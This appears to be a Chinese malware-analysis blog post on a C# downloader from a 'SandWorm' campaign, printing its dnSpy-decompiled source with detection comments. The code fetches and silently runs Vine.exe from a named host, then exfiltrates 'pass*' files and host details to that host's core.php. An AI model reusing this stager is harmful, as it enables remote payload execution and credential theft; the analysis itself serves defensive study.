Virus_C#_SampleAnalysis
0x1 背景
这几天在做一些小结,除了二进制之外,也对其他方面做点记录,本篇讲的是C#样本的简单分析.
前几天启明有篇文章讲到了SandWorm样本,漏洞部分也没有分析,就跟着文章的描述简单地过了一遍,并下载了文章中提到的Down样本.用PEiD查壳,显示为 Microsoft Visual C# / Basic .NET,于是快速做了分析.
0x2 主角登场
本来该先上样本的,但个人感觉dnSpy更牛逼闪闪,话不多说,上图:
注:在项目上右键:1 可以Debug,2 可以保存为本地项目(见附件).ILSpy也可以,不过喜欢的还是这俩.
2.1样本分析
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net.Http;
using System.Threading.Tasks;

// Analyst note: dnSpy decompilation of the downloader stage discussed in this write-up.
// The code is reproduced unchanged; comments describe the observed behaviour from a
// detection / response perspective. Labels such as IL_70 and the uninitialised `num`
// appear to be artifacts of the decompiled async state machine, not hand-written logic.
namespace DownloadAndExecute
{
    // Stager: drops three files into %APPDATA%, runs Vine.exe hidden, and — only if
    // Vine.exe exits with code 0 — exfiltrates "pass*" files from %APPDATA% to the same host.
    internal class Program
    {
        // One HttpClient shared by every network call (payload download, IP lookup, exfiltration).
        private static readonly HttpClient client = new HttpClient();

        // Set to true only at the very end of DownloadFiles(); gates the launch of Vine.exe.
        private static bool success = false;

        // Exit code of Vine.exe; UploadFiles() runs only when it is 0.
        private static int exitCode = 1;

        // Entry point: download -> execute -> (exit code 0) -> exfiltrate.
        private static void Main(string[] args)
        {
            // Synchronous block on the async download (console app, no sync context).
            Program.DownloadFiles().Wait();
            if (Program.success)
            {
                // Launches %APPDATA%\Vine.exe with no visible window.
                // Detection hint: process creation from %APPDATA% with hidden window style / CreateNoWindow.
                using (Process process = Process.Start(new ProcessStartInfo
                {
                    FileName = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe"),
                    WindowStyle = ProcessWindowStyle.Hidden,
                    WorkingDirectory = Path.GetDirectoryName(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe")),
                    CreateNoWindow = true
                }))
                {
                    process.WaitForExit();
                    Program.exitCode = process.ExitCode;
                }
            }
            // Exfiltration is conditional on the second stage signalling success via exit code 0.
            if (Program.exitCode == 0)
            {
                Program.UploadFiles().Wait();
            }
        }

        // Exfiltration routine. Decompiled form of: for each file in %APPDATA% whose name
        // starts with "pass", read it as text and POST it (plus host metadata) to core.php.
        // If the server echoes back the file name, the local file is deleted.
        // All exceptions are swallowed, so failures leave no trace in the process output.
        private static async Task UploadFiles()
        {
            try
            {
                int num;            // appears to be the async state-machine state field surfaced by the decompiler
                FileInfo[] array;   // files enumerated from %APPDATA%
                int num2;           // loop index into `array`
                if (num > 2)
                {
                    // Enumerates every file directly under %APPDATA% (no recursion).
                    FileInfo[] files = new DirectoryInfo(Path.Combine(new string[] { Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) })).GetFiles();
                    array = files;
                    num2 = 0;
                    goto IL_28A;
                }
            IL_70:
                FileInfo fileInfo;
                try
                {
                    // Whole file content is read as text and sent in the form body.
                    string value = File.ReadAllText(fileInfo.FullName);
                    string value2 = await Program.GetExternalIPAddress();
                    // Form fields sent to the C2: fixed "data" marker, user name, OS version,
                    // file name, public IP and the file content. Useful for network-signature writing.
                    FormUrlEncodedContent content = new FormUrlEncodedContent(new Dictionary<string, string>
                    {
                        { "data", "data" },
                        { "username", Environment.UserName },
                        { "os_version", Environment.OSVersion.VersionString },
                        { "file_path", fileInfo.Name },
                        { "public_ip", value2 },
                        { "file_content", value }
                    });
                    // IoC: HTTP POST to www.ictcoe.org.et/plugins/system/legacy/core.php.
                    // Server acknowledgement == file name triggers deletion of the exfiltrated file.
                    if (await (await Program.client.PostAsync("http://www.ictcoe.org.et/plugins/system/legacy/core.php", content)).Content.ReadAsStringAsync() == fileInfo.Name)
                    {
                        fileInfo.Delete();
                    }
                    value = null;
                }
                catch (Exception)
                {
                    // Per-file failure is ignored; the loop continues with the next file.
                }
            IL_275:
                fileInfo = null;
                num2++;
            IL_28A:
                if (num2 >= array.Length)
                {
                    array = null;
                }
                else
                {
                    fileInfo = array[num2];
                    // Only files whose name begins with "pass" (culture-sensitive StartsWith) are targeted.
                    if (fileInfo.Name.StartsWith("pass"))
                    {
                        goto IL_70;
                    }
                    goto IL_275;
                }
            }
            catch (Exception)
            {
                // Outer failure is also silent.
            }
        }

        // Fetches the host's public IP from checkip.dyndns.org and scrapes it from the HTML
        // response (text after the first ':' and a space, up to the next '<').
        // Returns "" on any failure. IoC: HTTP GET to checkip.dyndns.org.
        private static async Task<string> GetExternalIPAddress()
        {
            string result;
            try
            {
                result = (await (await Program.client.GetAsync("http://checkip.dyndns.org")).Content.ReadAsStringAsync()).Split(new char[] { ':' })[1].Substring(1).Split(new char[] { '<' })[0];
            }
            catch (Exception)
            {
                result = "";
            }
            return result;
        }

        // Drops Newtonsoft.Json.dll, System.Data.SQLite.DLL and Vine.exe into %APPDATA%,
        // downloading each from www.ictcoe.org.et/plugins/system/legacy/ only if it is not
        // already present. Writes each file's length to stdout and sets `success` at the end.
        // Any exception aborts the sequence silently and leaves `success` false.
        // Detection hint: file creation of these three names under %APPDATA% plus HTTP GETs
        // to the listed URLs. The dropped DLLs suggest the second stage uses JSON and SQLite
        // (e.g. browser credential stores) — inferred from the file names, not shown here.
        private static async Task DownloadFiles()
        {
            try
            {
                string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Newtonsoft.Json.dll");
                FileInfo fileInfo = new FileInfo(text);
                if (!fileInfo.Exists)
                {
                    // IoC: GET http://www.ictcoe.org.et/plugins/system/legacy/Newtonsoft.Json.dll
                    byte[] buffer = await (await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Newtonsoft.Json.dll")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_144 = new BinaryWriter(new FileStream(text, FileMode.Create));
                    expr_144.Write(buffer);
                    expr_144.Close();
                }
                fileInfo = new FileInfo(text);
                Console.WriteLine("Newton soft json dll length is: " + fileInfo.Length);

                string text2 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "System.Data.SQLite.DLL");
                FileInfo fileInfo2 = new FileInfo(text2);
                if (!fileInfo2.Exists)
                {
                    // IoC: GET http://www.ictcoe.org.et/plugins/system/legacy/System.Data.SQLite.DLL
                    byte[] var_7_27E = await (await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/System.Data.SQLite.DLL")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_291 = new BinaryWriter(new FileStream(text2, FileMode.Create));
                    expr_291.Write(var_7_27E);
                    expr_291.Close();
                }
                fileInfo2 = new FileInfo(text2);
                Console.WriteLine("Sqlite dll length is: " + fileInfo2.Length);

                string text3 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vine.exe");
                FileInfo fileInfo3 = new FileInfo(text3);
                if (!fileInfo3.Exists)
                {
                    // IoC: GET http://www.ictcoe.org.et/plugins/system/legacy/Vine.exe (second-stage payload)
                    byte[] var_8_3CB = await (await Program.client.GetAsync("http://www.ictcoe.org.et/plugins/system/legacy/Vine.exe")).Content.ReadAsByteArrayAsync();
                    BinaryWriter expr_3DE = new BinaryWriter(new FileStream(text3, FileMode.Create));
                    expr_3DE.Write(var_8_3CB);
                    expr_3DE.Close();
                }
                fileInfo3 = new FileInfo(text3);
                Console.WriteLine("Vine exe length is: " + fileInfo3.Length);

                // Reached only if all three files exist or were written without error.
                Program.success = true;
                text = null;
                text2 = null;
                text3 = null;
            }
            catch (Exception)
            {
                // Silent failure: `success` stays false and Main() never launches Vine.exe.
            }
        }
    }
}
0x3 Sample
Sample-请确认样本只用于测试再下载,其他用途造成的后果我可不负责-密码国际惯例
0x4 参考文章
“沙虫”二代来袭,office全线沦陷!